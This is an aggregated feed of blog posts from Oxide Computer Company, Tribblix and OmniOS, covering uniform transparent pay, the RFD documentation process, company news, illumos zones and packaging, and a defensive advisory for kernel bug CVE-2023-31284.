Compensation: the word alone is enough to trigger a fight-or-flight reaction in many. But we in technology have the good fortune of being in a well-compensated domain, so why does this issue induce such anxiety when our basic needs are clearly covered? If it needs to be said, it’s because compensation isn’t merely about the currency we redeem in exchange for our labors, but rather it is a proxy for how we are valued in a larger organization. This, in turn, brings us to our largest possible questions for ourselves, around things like meaning and self-worth.

So when we started Oxide – as in any new endeavor – compensation was an issue we had to deal with directly. First, there was the thorny issue of how we founders would compensate ourselves. Then, of course, came the team we wished to hire: hybrid local and remote, largely experienced to start (on account of Oxide’s outrageously ambitious mission), and coming from a diverse set of backgrounds and experiences. How would we pay people in different geographies? How could we responsibly recruit experienced folks, many of whom have families and other financial obligations that can’t be addressed with stock options? How could we avoid bringing people’s compensation history – often a reflection of race, gender, class, and other factors rather than capability – with them?

We decided to do something outlandishly simple: take the salary that Steve, Jess, and I were going to pay ourselves, and pay that to everyone. The three of us live in the San Francisco Bay Area, and Steve and I each have three kids; we knew that the dollar figure that would allow us to live without financial distress – which we put at $175,000 a year – would be at least universally adequate for the team we wanted to build. And we mean everyone literally: as of this writing we have 23 employees, and that’s what we all make.

Now, because compensation is the hottest of all hot buttons, it can be fairly expected that many people will have a reaction to this. Assuming you’ve made it to this sentence it means you are not already lighting us up in your local comments section (thank you!), and I want to promise in return that we know some likely objections, and we’ll address those. But before we do, we want to talk about the benefits of transparent uniform compensation, because they are, in a word, profound.

Broadly, our compensation model embodies our mission, principles, and values. First and foremost, we believe that our compensation model reflects our principles of honesty, integrity, and decency. To flip it around: sadly, we have seen extant comp structures in the industry become breeding grounds for dishonesty, deceit, and indecency. Beyond our principles, our comp model is a tangible expression of several of our values in particular:

  • It has set the tone with respect to teamwork. In my experience, the need to "quantify" one’s performance in exchange for justifying changes to individual compensation are at the root of much of what’s wrong in the tech industry. Instead of incentivizing people to achieve together as a team, they are incentivized to advance themselves – usually with sophisticated-sounding jargon like OKRs or MBOs, or perhaps reasonable-sounding (but ultimately misguided) mantras like "measure everything." Even at their very best, these individual incentives represent a drag on a team, as their infrequent calibration can prevent a team from a necessary change in its direction. And at worst, they leave individuals perversely incentivized and operating in direct opposition to the team’s best interest. When comp is taken out of the picture, everyone can just focus on what we need to focus on: getting this outlandish thing built, and loving and serving the customers who are taking a chance on it.

  • It is an expression of our empathy. Our approach to compensation reflects our belief in treating other people the way that we ourselves want to be treated. There are several different dimensions for this, but one is particularly visceral: because we have not talked about this publicly, candidates who have applied to Oxide have done so assuming that we have a traditional comp model, and have braced themselves for the combat of a salary negotiation. But we have spoken about it relatively upfront with candidates (before they talk to the team, for example), and (as the one who has often had this discussion) the relief is often palpable. As one recent candidate phrased it to me: "if I had known about this earlier, I wouldn’t have wasted time stressing out about it!"

  • It is (obviously?) proof-positive of our transparency. Transparency is essential for building trust, itself one of the most important elements of doing something bold together. One of the interesting pieces of advice we got early on from someone who has had outsized, repeated success: modulo private personnel meetings, make sure that every meeting is open to everyone. For those accustomed to more opaque environments, our level of transparency can be refreshing: for example, new Oxide employees have been pleasantly surprised that we always go through our board decks with everyone – but we can’t imagine doing it any other way. Transparent compensation takes this to an unusual (but not unprecedented) extreme, and we have found it to underscore how seriously we take transparency in general.

  • It has allowed whole new levels of candor. When everyone can talk about their salary, other things become easier to discuss directly. This candor is in all directions; without comp to worry about, we can all be candid with respect to our own struggles – which in turn allows us to address them directly. And we can be candid too when giving public positive feedback; we don’t need to be afraid that by calling attention to someone’s progress, someone else will feel shorted.

These are (some of!) the overwhelming positives; what about those objections?

  • Some will say that this salary is too low. While cash compensation gets exaggerated all of the time, it’s unquestionable that salaries in our privileged domain have gotten much higher than our $175,000 (and indeed, many at Oxide have taken a cut in pay to work here). But it’s also true that $175,000 per year puts us each in the top 5% of US individual earners – and it certainly puts a roof over our families' heads and food in their bellies. Put more viscerally: this is enough to not fret when your kids toss the organic raspberries into the shopping cart – or when they devour them before you’ve managed to get the grocery bags out of the car! And speaking of those families: nothing is more anxiety-producing than having a healthcare issue compounded by financial distress due to inadequate insurance; Oxide not only offers the best healthcare plans we could find, but we also pay 100% of monthly premiums – a significant benefit for those with dependents.

  • Some will say that we should be paying people differently based on different geographical locations. I know there are thoughtful people who pay folks differently based on their zip code, but (respectfully), we disagree with this approach. Companies spin this by explaining they are merely paying people based on their cost of living, but this is absurd: do we increase someone’s salary when their spouse loses their job or when their kid goes to college? Do we slash it when they inherit money from their deceased parent or move in with someone? The answer to all of these is no, of course not: we pay people based on their work, not their costs. The truth is that companies pay people less in other geographies for a simple reason: because they can. We at Oxide just don’t agree with this; we pay people the same regardless of where they pick up their mail.

  • Some will say that this doesn’t scale. This is, at some level, surely correct: it’s hard to envision a multi-thousand employee Oxide where everyone makes the same salary – but it has also been (rightly) said that startups should do things that don’t scale. And while it seems true that the uniformity won’t necessarily scale, we believe that the values behind it very much will!

  • Some will say that this makes us unlikely to hire folks just starting out in their career. There is truth to this too, but the nature of our problem at Oxide (namely, technically very broad and very deep), the size of our team (very small), and the stage of our company (still pretty early!) already means that engineers at the earliest stages of their career are unlikely to be a fit for us right now. That said, we don’t think this is impossible; and if we felt that we had someone much earlier in their career who was a fit – that is, if we saw them contributing to the company as much as anyone else – why wouldn’t we reflect that by paying them the same as everyone else?

  • Some will say that this narrows the kind of roles that we can hire for. In particular, different roles can have very different comp models (sales often has a significant commission component in exchange for a lower base, for example). There is truth to this too – but for the moment we’re going to put this in the "but-this-can’t-scale" bucket.

  • Some will say that this doesn’t offer a career ladder. Uniform compensation causes us to ask some deeper questions: namely, what is a career ladder, anyway? To me, the true objective for all of us should be to always be taking on new challenges – to be unafraid to learn and develop. I have found traditional ladders to not serve these ends particularly well, because they focus us on competition rather than collaboration. By eliminating the rung of compensation, we can put the focus on career development where it belongs: on supporting one another in our self-improvement, and working together to do things that are beyond any one of us.

  • Some will say that we should be talking about equity, not cash compensation. While it’s true that startup equity is important, it’s also true that startup equity doesn’t pay the orthodontist’s bill or get the basement repainted. We believe that every employee should have equity to give them a stake in the company’s future (and that an outsized return for investors should also be an outsized return for employees), but we also believe that the presence of equity can’t be used as an excuse for unsustainably low cash compensation. As for how equity is determined, it really deserves its own in-depth treatment, but in short, equity compensates for risk – and in a startup, risk reduces over time: the first employee takes much more risk than the hundredth.

Of these objections, several are of the ilk that this cannot endure at arbitrary scale. This may be true – our compensation may well not be uniform in perpetuity – but we believe wholeheartedly that our values will endure. So if and when the uniformity of our compensation needs to change, we fully expect that it will remain transparent – and that we as a team will discuss it candidly and empathetically. In this regard, we take inspiration from companies that have pioneered transparent compensation. It is very interesting to, for example, look at how Buffer’s compensation has changed over the years. Their approach is different from ours in the specifics, but they are a kindred spirit with respect to underlying values – and their success with transparent compensation gives us confidence that, whatever changes must come with time, we will be able to accommodate them without sacrificing what is important to us!

Finally, a modest correction. The $175,000 isn’t quite true – or at least not anymore. I had forgotten that when we did our initial planning, we had budgeted modest comp increases after the first year, so it turns out, we all got a raise to $180,250 in December! I didn’t know it was coming (and nor did anyone else); Steve just announced it in the All Hands: no three-hundred-and-sixty degree reviews, no stack ranking, no OKRs, no skip-levels, no numerical grades – just a few more organic raspberries in everyone’s shopping basket. Never has a change in compensation felt so universally positive!

UPDATE: Since originally writing this blog entry in 2021, we have increased our salary to $191,227.

RFD 1 Requests for Discussion Oxide Computer Company Blog

One of the first things we did in setting up the company was create a repo named “rfd.” This repo houses our requests for discussion. Bryan teased this to the internet…

…and folks asked for our process, so we are going to share it!

The best way to describe RFDs is with “RFD 1 Requests for Discussion.” Below is that RFD.

Writing down ideas is important: it allows them to be rigorously formulated (even while nascent), candidly discussed and transparently shared. We capture the written expression of an idea in a Request for Discussion (RFD), a document in the original spirit of the IETF Request for Comments, as expressed by RFC 3:

The content of a note may be any thought, suggestion, etc. related to the software or other aspect of the network. Notes are encouraged to be timely rather than polished. Philosophical positions without examples or other specifics, specific suggestions or implementation techniques without introductory or background explication, and explicit questions without any attempted answers are all acceptable. The minimum length for a note is one sentence.

These standards (or lack of them) are stated explicitly for two reasons. First, there is a tendency to view a written statement as ipso facto authoritative, and we hope to promote the exchange and discussion of considerably less than authoritative ideas. Second, there is a natural hesitancy to publish something unpolished, and we hope to ease this inhibition.

Similar to RFCs, our philosophy of RFDs is to allow both timely discussion of rough ideas, while still becoming a permanent repository for more established ones. Depending on their state, RFDs may be quickly iterated on in a branch, discussed actively as part of a pull request to be merged, or commented upon after having been published. The workflow for the RFD process for is based upon those of the Golang proposal process, Joyent RFD process, Rust RFC process, and Kubernetes proposal process.

When to use an RFD

The following are examples of when an RFD is appropriate, these are intended to be broad:

  • Add or change a company process

  • An architectural or design decision for hardware or software

  • Change to an API or command-line tool used by customers

  • Change to an internal API or tool

  • Change to an internal process

  • A design for testing

RFDs not only apply to technical ideas but overall company ideas and processes as well. If you have an idea to improve the way something is being done as a company, you have the power to make your voice heard by adding to discussion.

RFD Metadata and State

At the start of every RFD document, we’d like to include a brief amount of metadata. The metadata format is based on the python-markdown2 metadata format. It’d look like:

authors: Andy Smith <andy@example.computer>, Neal Jones <neal@example.computer>
state: prediscussion

We keep track of three pieces of metadata:

  1. authors: the authors (and therefore owners) of an RFD. They should be listed with their name and e-mail address.

  2. state: must be one of the states discussed below.

  3. discussion: for RFDs that are in or beyond the discussion state, this should be a link to the PR to integrate the RFD; see below for details.

An RFD can be in one of the following six states:

  1. prediscussion

  2. ideation

  3. discussion

  4. published

  5. committed

  6. abandoned

A document in the prediscussion state indicates that the work is not yet ready for discussion, but that the RFD is effectively a placeholder. The prediscussion state signifies that work iterations are being done quickly on the RFD in its branch in order to advance the RFD to the discussion state.

A document in the ideation state contains only a description of the topic that the RFD will cover, providing an indication of the scope of the eventual RFD. Unlike the prediscussion state, there is no expectation that it is undergoing active revision. Such a document can be viewed as a scratchpad for related ideas. Any member of the team is encouraged to start active development of such an RFD (moving it to the prediscussion state) with or without the participation of the original author. It is critical that RFDs in the ideation state are clear and narrowly defined.

Documents under active discussion should be in the discussion state. At this point a discussion is being had for the RFD in a Pull Request.

Once (or if) discussion has converged and the Pull Request is ready to be merged, it should be updated to the published state before merge. Note that just because something is in the published state does not mean that it cannot be updated and corrected. See the Making changes to an RFD section for more information.

The prediscussion state should be viewed as essentially a collaborative extension of an engineer’s notebook, and the discussion state should be used when an idea is being actively discussed. These states shouldn’t be used for ideas that have been committed to, organizationally or otherwise; by the time an idea represents the consensus or direction, it should be in the published state.

Once an idea has been entirely implemented, it should be in the committed state. Comments on ideas in the committed state should generally be raised as issues — but if the comment represents a call for a significant divergence from or extension to committed functionality, a new RFD may be called for; as in all things, use your best judgment.

Finally, if an idea is found to be non-viable (that is, deliberately never implemented) or if an RFD should be otherwise indicated that it should be ignored, it can be moved into the abandoned state.

We will go over this in more detail. Let’s walk through the life of a RFD.

RFD life-cycle

There is a prototype script in this repository, scripts/new.sh, that will automate the process.

              $ scripts/new.sh 0042 “My title here”

If you wish to create a new RFD by hand, or understand the process in greater detail, read on.


Never at anytime through the process do you push directly to the master branch. Once your pull request (PR) with your RFD in your branch is merged into master, then the RFD will appear in the master branch.

Reserve a RFD number

You will first need to reserve the number you wish to use for your RFC. This number should be the next available RFD number from looking at the current git branch -r output.

Create a branch for your RFD

Now you will need to create a new git branch, named after the RFD number you wish to reserve. This number should have leading zeros if less than 4 digits. Before creating the branch, verify that it does not already exist:

              $ git branch -rl *0042

If you see a branch there (but not a corresponding sub-directory in rfd in master), it is possible that the RFD is currently being created; stop and check with co-workers before proceeding! Once you have verified that the branch doesn’t exist, create it locally and switch to it:

              $ git checkout -b 0042

Create a placeholder RFD

Now create a placeholder RFD. You can do so with the following commands:

              $ mkdir -p rfd/0042
$ cp prototypes/prototype.md rfd/0042/README.md

Or if you prefer asciidoc

              $ cp prototypes/prototype.adoc rfd/0042/README.adoc

Fill in the RFD number and title placeholders in the new doc and add your name as an author. The status of the RFD at this point should be prediscussion.

If your preference is to use asciidoc, that is acceptable as well, however the examples in this flow will assume markdown.

Push your RFD branch remotely

Push your changes to your RFD branch in the RFD repo.

              $ git add rfd/0042/README.md
$ git commit -m ‘0042: Adding placeholder for RFD <Title>’
$ git push origin 0042

After your branch is pushed, the table in the README on the master branch will update automatically with the new RFD. If you ever change the name of the RFD in the future, the table will update as well. Whenever information about the state of the RFD changes, this updates the table as well. The single source of truth for information about the RFD comes from the RFD in the branch until it is merged.

Iterate on your RFD in your branch

Now, you can work on writing your RFD in your branch.

              $ git checkout 0042

Now you can gather your thoughts and get your RFD to a state where you would like to get feedback and discuss with others. It’s recommended to push your branch remotely to make sure the changes you make stay in sync with the remote in case your local gets damaged.

It is up to you as to whether you would like to squash all your commits down to one before opening up for feedback, or if you would like to keep the commit history for the sake of history.

Discuss your RFD

When you are ready to get feedback on your RFD, make sure all your local changes are pushed to the remote branch. At this point you are likely at the stage where you will want to change the status of the RFD from prediscussion to discussionfor a fully formed RFD or to ideation for one where only the topic is specified. Do this in your branch.

Push your RFD branch remotely

Along with your RFD content, update the RFD’s state to discussion in your branch, then:

              $ git commit -am ‘0042: Add RFD for <Title>’
$ git push origin 0042

Open a Pull Request

Open a pull request on GitHub to merge your branch, in this case 0042 into the master branch.

If you move your RFD into discussion but fail to open a pull request, a friendly bot will do it for you. If you open a pull request but fail to update the state of the RFD to discussion, the bot will automatically correct the state by moving it into discussion. The bot will also cleanup the title of the pull request to be RFD {num} {title}. The bot will automatically add the link to the pull request to the discussion: metadata.

After the pull request is opened, anyone subscribed to the repo will get a notification that you have opened a pull request and can read your RFD and give any feedback.

Discuss the RFD on the pull request

The comments you choose to accept from the discussion are up to you as the owner of the RFD, but you should remain empathetic in the way you engage in the discussion.

For those giving feedback on the pull request, be sure that all feedback is constructive. Put yourself in the other person’s shoes and if the comment you are about to make is not something you would want someone commenting on an RFD of yours, then do not make the comment.

Merge the Pull Request

After there has been time for folks to leave comments, the RFD can be merged into master and changed from the discussion state to the published state. The timing is left to your discretion: you decide when to open the pull request, and you decide when to merge it. As a guideline, 3-5 business days to comment on your RFD before merging seems reasonable — but circumstances (e.g., time zones, availability of particular expertise, length of RFD) may dictate a different timeline, and you should use your best judgment. In general, RFDs shouldn’t be merged if no one else has read or commented on it; if no one is reading your RFD, it’s time to explicitly ask someone to give it a read!

Discussion can continue on published RFDs! The discussion: link in the metadata should be retained, allowing discussion to continue on the original pull request. If an issue merits more attention or a larger discussion of its own, an issue may be opened, with the synopsis directing the discussion.

Any discussion on an RFD in the can still be made on the original pull request to keep the sprawl to a minimum. Or if you feel your comment post-merge requires a larger discussion, an issue may be opened on it — but be sure to reflect the focus of the discussion in the issue synopsis (e.g., “RFD 42: add consideration of RISC-V”), and be sure to link back to the original PR in the issue description so that one may find one from the other.

Making changes to an RFD

After your RFD has been merged, there is always opportunity to make changes. The easiest way to make a change to an RFD is to make a pull request with the change you would like to make. If you are not the original author of the RFD name your branch after the RFD # (e.g. 0001) and be sure to @ the original authors on your pull request to make sure they see and approve of the changes.

Changes to an RFD will go through the same discussion and merge process as described above.

Committing to an RFD

Once an RFD has become implemented — that is, once it is not an idea of some future state but rather an explanation of how a system works — its state should be moved to be committed. This state is essentially no different from published, but represents ideas that have been more fully developed. While discussion on committed RFDs is permitted (and changes allowed), they would be expected to be infrequent.

Changing the RFD process

The best part about the RFD process is that it itself is expressed in this RFD; if you want to change the process itself, you can apply the RFD process to its own RFD: chime in on the discussion link or open an issue as dictated by its current state!



Because RFDs are so core to everything we do, we automatically update a CSV file of all the RFDs along with their state, links, and other information in the repo for easy parsing. We then have functions in rust that allow us to easily get this information and automate or program tooling with RFD data.

Short URLs

As you can imagine, keeping track of RFDs and their links is unweidly at scale. To help, we have short URLs. You can link to any RFD on GitHub with {num}.rfd.oxide.computer. So for example, 12.rfd.oxide.computer. The path also works: rfd.oxide.computer/12 if that is preferred.

Any discussion for an RFD can be linked with {num}.rfd.oxide.computer/discussion.

These short URLs get automatically updated when a new RFD is opened.

Chat bot

In chat you can use !rfd {any text} | {rfd number} to return information about that RFD. For example, !rfd 1 returns the links to RFD 1, its discussion (if it is in discussion), and information about its state. Remembering the number for an RFD is often hard so any strings you pass to the bot will be fuzzy matched across RFD titles. !rfd user api will return the RFD that title matches the text. In this example, it is RFD 4.

Shared RFD Rendered Site

As a way to share certain RFDs with other parties like potential customers, partners, and friends of the company, we have created a website that renders the RFD markdown or asciidoc into HTML in a nice format. This is a nice way to get feedback without adding everyone to the repo (as well as nicely formatting the content).

And that’s a wrap! Hopefully, this is helpful if you ever think about doing the same type of process internally!

March 2020 Update Oxide Computer Company Blog

Hello friends!

I want to start by saying we wish you the very best during this unprecedented time in which we are all united. Our thoughts go out to everyone working hard to help those in need. We wish you and your families health and resilience.

Hard at work…​ and growing

A lot has happened at Oxide since we first de-cloaked in December and I apologize for the lack of an official update on our end, other than our Twitter feeds. We’ve been hard at work building a product!

We are now a team of 15 people! Everyone was in Emeryville for the Open Compute Summit, which was cancelled, but we still made the best of it by having company-wide face-to-face architecture discussions. We even snapped a photo with the whole team. As Bryan said: we cannot wait for this image to be burned into a ROM.

Figure 1. Team

Computer History Museum

We also made sure to visit the Computer History Museum while everyone was in town. It was fun to have some folks from the open firmware community join us as well! Since it was not busy we got to spend an unusually long amount of time with the docent at the IBM 1401 demo which was fascinating.

computer history museum
Figure 2. Computer history museum

On the Metal

Last month, we wrapped up the first season of our podcast, On the Metal. These were super fun to record and I know we are looking forward to Season 2 just as much as you are!


On February 18th, we received the most perfect PCI vendor ID: 01DE. Huge thanks to Robert Mustacchi for getting that!

The Soul of a New Machine at Stanford

Bryan gave a talk at Stanford on The Soul of a New Machine.

In the media

Tom Krazit at Protocol published a feature on what we are working on: This little server startup wants to take on a horde of tech giants.

Moving in

Cliff L. Biffle made us new signs for our conference rooms!

office signs

We have gotten some amazing mugs from folks for our collection, thank you all so much!

The phone lines are now open!

Last Monday, I opened our phone line to anyone who wanted to share stories about their hardware pain. Thank you to everyone for the wonderful conversations!

oxide.computer v2

On Wednesday, Jared Volpe shipped the redesign of this website! Pro tip: check out the 404 page ;)

Bryan at Oxidize 1K

On Friday, Bryan gave a talk on at Oxidize 1K on "Tockilator: Deducing Tock execution flow from Ibex Verilator traces".

We will update this post once the video becomes available! For a good synopsis of the conference check out this post.

Stay tuned!

That’s all for now. We will continue to update you with news as we go about building.

RIP Khaled Bichara, 1971-2020 Oxide Computer Company Blog

We were deeply saddened to learn that Khaled Bichara, one of Oxide’s angel investors, died in a car accident in Cairo on Friday night.

Those of us who have known Khaled for years have known him to be a bold investor who appreciated hard technical problems – and also a profoundly decent person, who cared deeply for his family, his companies, and his country. Khaled’s stories of kindling entrepreneurship in Egypt were inspiring to any who heard them – and served as a reminder of the reponsibility that we all have to our broader communities. Our most recent conversation with Khaled – just a few short months ago – remains vivid: he was excited by our technical vision and thrilled to be a part of Oxide. For our part, we were looking forward to a long journey together, and to making good on his belief in us; we are gutted to have lost him so abruptly. Our heart goes out to his family, and to all those who he touched over his career; Silicon Valley may be a long way from Cairo, but his impact and legacy will be felt here for years to come.

Oxide Computer Company: Initial boot sequence Oxide Computer Company Blog

We have started a computer company! If you haven’t yet, read Jess’s account of us being born in a garage and Bryan’s on the soul of our new computer company. Also, see the perspectives of some of our founding engineers: Robert Mustacchi on joining Oxide, Joshua Clulow on the need for a new machine, and Patrick Mooney on everything he sees aligning at Oxide (and in particular, on the importance of Oxide’s principles!).

If it needs to be said, starting a computer company is an ambitious endeavor; we are thrilled to have investment led by Eclipse Ventures and joined by an incredible group of institutional and angel investors. Our investors see what we see: the potential to integrate hardware and software together to bring hyperscaler-class infrastructure to everyone.

To use the machine as metaphor, Oxide is at the earliest stages of boot: the power is on, and the first instructions have been executed – but we have a long way to go before we’re fully operational! If you are interested in following our progress sign up for our mailing list. If you are interested in potentially joining us, check out our careers page. And if nothing else, give a listen to our podcast, On the Metal!

Zones, way back when The Trouble with Tribbles...

The original big ticket feature in Solaris 10 was Zones, a simple virtualization technology that allowed a set of processes to be put aside in a separate namespace and be under the illusion that this was a separate computer system, all under a single shared kernel.

As a result of this sleight of hand, you could connect to a zone using ssh (or, remember this was way back, telnet or rsh), and from the application level you really were in a separate system - with your own file system and network namespaces. It was like magic.

Of the features in Solaris 10, Zones and DTrace were present early in the beta cycle, while SMF just made it into the last couple of beta builds, and ZFS wasn't actually available to customers until well after the first Solaris 10 release.

I ended up using zones in production quite accidentally. In the Solaris 10 Platinum Beta, we were testing the new features, just giving them a good beating, when one of our webservers (it was something like a Netra X1) died. Sure, we could have got it repaired, or reconfigured another server. But as an experiment, I simply fired up a zone on one of my beta systems, gave it the IP address of the failed server, installed apache, copied over the website, and we were back in service in about 5 minutes.

The Zones framework turns out to be incredibly flexible and powerful. I suspect most don't realize just what it's actually capable of, as Sun only gave you a canned product in two variations - whole-root and sparse-root zones. Later you saw glimpses of the power available with the first incarnation of LX zones (or SCLA - Solaris Containers for Linux Applications) and then the Solaris 8 and Solaris 9 containers, which allowed a different set of applications to run inside a zone.

Things actually became more limited in OpenSolaris and its derivatives such as Solaris 11; not only was LX removed, but so were sparse-root zones, and the diversity of potential zone types dwindled.

In illumos, some of the distributions have pushed Zones a bit further. Tribblix brought back sparse root zones, and introduced the alien brand - essentially a way to run any illumos OS or application in a zone. OmniOS has brought back LX, and it's reasonably current (in terms of keeping up with changes in the Linux world). SmartOS ran KVM in Zones, allowing double-hulled virtualization. And we now have bhyve as a fully supported offering for any illumos distribution, usually
embedded in a Zone.

Using a sparse-root zone is incredibly efficient. By sharing the main operating system files (mostly /lib and /usr, but can be others) you can save huge amounts of disk space - you only have to have one copy so that's a saving of anything for a couple of hundred megabytes to a couple of gigabytes of storage per zone. It gets better, because the read-only segments of any binaries and shared libraries are shared between zones, which dramatically reduces the additional memory footprint of each zone. Further on from that, because Solaris has this trick whereby any shared object used more that 8 times (or something like that) is kept resident in memory, all the common applications are always in memory and start incredibly quickly.

One of the things I did was use sparse-root zones and shared filesystems for a development -> test -> production setup. Basically, you create 3 zones, sparse-root ensures they're identical, and 3 filesystems - one each for development, test, and production. You share the development filesystem read-only into the test zone, so deployment from development to test is a straight copy. Likewise test to production.

One of the weaknesses of the way that zones were managed (distinct from the underlying technology framework) is that it was based around packaging. In Solaris 10, packaging and packages knew about zones, and the details about what files and packages ended up in a zone was embedded in the package metadata. Not only is this complex, it's also very rigid - you can't evolve the system without changing the packaging system and modifying all the packages. Sadly, IPS carried forward the same mistake. (In Tribblix, packaging knows nothing about zones whatsoever, but my zones understand packaging and can do the right thing with it - not only with much more flexibility but many times quicker.)

Later on in the Solaris 10 timeframe we got ZFS, which allowed you to do interesting things around sharing data and quickly creating copies of data for zones, allowing you to extend the virtual capabilities of zones from cpu and memory to storage. And the key missing piece, virtualized networking, never made it to Solaris 10 at all, but had to wait for crossbow to arrive in OpenSolaris.

Maintaining old software with no sign of retirement The Trouble with Tribbles...

There's a lot of really old software out there. Some of it has simply been abandoned; others have been replaced by new versions. But old software never really goes away, and we end up maintaining it.

This is especially tricky when old software depends on other old software, and we have to support the entire dependency tree.

There's always python2 and python 3. Some old software may never be fixed; some current software has consciously decided to stick to python 2. Distributions will be shipping python 2 for a long time yet.

Then there's PCRE and PCRE2. Some things have been updated; others haven't. Generally for this I'll keep updating, and eventually upstream might get around to migrating. But again I'll have to ship both for a while.

And then there's gtk2 and gtk3. (I find it ironic that the gimp itself is still using gtk2.) There's no end in sight of the need to ship both.

Some libraries have been deprecated entirely. the old libXp (the X printing library) is long gone. There were a couple of things built against it in Tribblix. I've just rebuilt chimera (a really old Xaw web browser if your memory doesn't go that far back) which was one consumer and now isn't; the other one was Motif (there's a convenient build flag --disable-printing to disable libXp support, which entertainingly breaks the build someplace else which I ended up having to fix).

Another example, libpng has gone through several different revisions. Each slightly incompatible, and you have to be sure to run with the same version you built against. At least you can ship all the different versions, as they have the version in the names. Mind you, linking against 2 different versions of libpng at the same time (for example, if a dependency pulls in a different version of libpng) is a bad thing, so I did have to rebuild a number of applications to avoid that. I ship the old libpng versions in a separate compat package, I think chimera was the only consumer, but I updated that to use a more current libpng.

A slightly different problem is the use of newer toolchains. Compilers are getting stricter over time, so old unmaintained software needs patches to even compile.

Don't even get me started on openssl.

Upgrading MATE on Tribblix The Trouble with Tribbles...

I spent a little time yesterday updating MATE on Tribblix, to version 1.26.

This was supposed to be part of the "next" release, but we had to make an out of sequence release for an illumos security issue, so everything gets pushed back a bit.

Updating MATE is actually fairly easy, though. The components in MATE are largely decoupled, so can be updated independently of each other. (And there isn't really a MATE framework everything has to subscribe to, so the applications can be used outside MATE without any issues.)

There's a bit of tidying up and polish that helps. For example, I delete static archives and the harmful libtool archive files. Not only does this save space, it helps maintainability down the line.

Builds have a habit of picking up dependencies from the build system. Sometimes you can control this with judicious --enable-foo or --disable-foo flags, sometime you just have to make sure that the package you don't want pulled in isn't installed. The reverse is true - if you want a feature to be enabled, you have to make sure the dependencies are installed first and the feature will usually get enabled automatically.

That's not always true. For example, you have to explicitly tell it you have OSS for audio, it doesn't work this out on its own.

I took the opportunity to make everything 64-bit. Ultimately I want to get to 64-bit only. This involves a bit of working backwards - you have to make all consumers of a library 64-bit only first.

A couple of components are held downrev. The calculator now wants to pull in mpc and mpfr, which I don't package. (They're used by gcc, but I drop a copy of mpc and mpfr into the build for gcc to find rather than packaging them separately the way that most of the other illumos distributions do.) And pluma wants gtksourceview-4 which I don't have yet. This is related to the lack of tight coupling I mentioned earlier - there really isn't any problem having the different pieces that make up MATE at different revisions.)

You stumble across bugs along the way. For example, mate-control-center actually needs GLib 2.66 or later, which I don't have yet (there's another whole set of issues behind that), but it doesn't actually check for the right version. Fortunately the requirement is fairly localized and easy to patch out.

That done, on to another set of updates...

Security Alert - CVE-2023-31284 Buffer Overflow OmniOS Community Edition

The illumos security team have today published a security advisory concerning CVE-2023-31284, a kernel stack overflow that can be performed by an unprivileged user, either in the global zone or in any non-global zone. A copy of their advisory is below.

ACTION: If you are using any of the supported OmniOS versions, or the recently retired r42, run pkg update to upgrade to a version that includes the fix. Note, that a reboot is required. If you have already upgraded to r46, then you are all set as it already includes the fix.

The following OmniOS versions include the fix:

  • r151046
  • r151044y
  • r151042az
  • r151038cz

If you are running an earlier version, upgrade to a supported version (in stages if necessary) following the upgrade guide.

illumos Security Team advisory

We are reaching out today to inform you about CVE-2023-31284. We have pushed a commit to address this, which you can find at https://github.com/illumos/illumos-gate/commit/676abcb77c26296424298b37b9. While we don’t currently know of anyone exploiting this in the wild, this is a kernel stack overflow that can be performed by an unprivileged user, either in the global zone, or any non-global zone.

The following details provide information about this particular issue:

IMPACT: An unprivileged user in any zone can cause a kernel stack buffer overflow. While stack canaries can capture this and lead to a denial of service, it is possible for a skilled attacker to leverage this for local privilege escalation or execution of arbitrary code (e.g. if combined with another bug such as an information leak).

ACTION: Please be on the look out for patches from your distribution and be ready to update.

MITIGATIONS: Running a kernel built with -fstack-protector (the illumos default) can help mitigate this and turn these issues into a denial of service, but that is not a guarantee. We believe that unprivileged processes which have called chroot(2) with a new root that does not contain the sdev (/dev) filesystem most likely cannot trigger the bug, but an exhaustive analysis is still required.

Please reach out to us if you have any questions, whether on the mailing list, IRC, or otherwise, and we’ll try to help as we can.

We’d like to thank Alex Wilson and the students at the University of Queensland for reporting this issue to us, and to Dan McDonald for his work in fixing it.

The illumos Security Team

Any problems or questions, please get in touch.

OmniOS Community Edition r151046 OmniOS Community Edition

OmniOSce v11 r151046 is out!

On the 1st of May 2023, the OmniOSce Association has released a new stable version of OmniOS - The Open Source Enterprise Server OS. The release comes with many tool updates, brand-new features and additional hardware support. For details see the release notes.

Note, that r151042 is now end-of-life. You should upgrade to r151046 to stay on a supported track. r46 is an LTS release with support until May 2026.

For anyone who tracks LTS releases, the previous LTS - r151038 - now enters its last year. You should plan to upgrade to r151046 during the next twelve months for continued support.

OmniOS is fully Open Source and free. Nevertheless, it takes a lot of time and money to keep maintaining a full-blown operating system distribution. Our statistics show that there are almost 2’000 active installations of OmniOS while fewer than 20 people send regular contributions. If your organization uses OmniOS based servers, please consider becoming a regular patron or taking out a support contract.

Any problems or questions, please get in touch.

The Final Lesson Tracing Kernel Functions: How the illumos AMD64 FBT Provider Intercepts Function Calls

The final lesson my father taught me.

SPARC Tribblix m26 - what's in a number? The Trouble with Tribbles...

I've just released Tribblix m26 for SPARC.

The release history on SPARC looks a little odd - m20, m20.6, m22, m25.1, and now m26. Do these release versions mean anything?

Up to and including m25.1, the illumos commit that the SPARC version was built from matched the corresponding x86 release. This is one reason there might be a gap in the release train - that commit might not build or work on SPARC.

As of m26, the version numbers start to diverge between SPARC and x86. In terms of illumos-gate, this release is closer to m25.2, but the added packages are generally fairly current, closer to m29. So it's a bit of a hybrid.

But the real reason this is a full release rather than an m25 update is to establish a new baseline, which allows me to establish compatibility guarantees and roll over versions of key components, in this case it allows me to upgrade perl.

In the future, the x86 and SPARC releases are likely to diverge further. Clearly SPARC can't track the x86 releases perfectly, as SPARC support is being removed from the mainline source following IPD 19, and many of the recent changes in illumos simply aren't relevant to SPARC anyway. So future SPARC releases are likely to simply increment independently.

How I build the Tribblix AMIs The Trouble with Tribbles...

I run Tribblix on AWS, and make some AMIs available. They're only available in London (eu-west-2) by default, because that's the only place where I use them, and it costs money to have them available in other regions. If you want to run them elsewhere, you can copy the AMI.

It's not actually that difficult to create the AMIs, once you've got the hang of it. Certainly some of the instructions you might find can seem a little daunting. So here's how I do it. Some of the details here are very specific to my own workflow, but the overall principles are fairly generic. The same method would work for any of the illumos distributions, and you could customize the install however you wish.

The procedure below assumes you're running Tribblix m29 and have bhyve installed.

The general process is to boot and install an instance into bhyve, then boot that and clean it up, save that disk as an image, upload to S3, and register an AMI from that image.

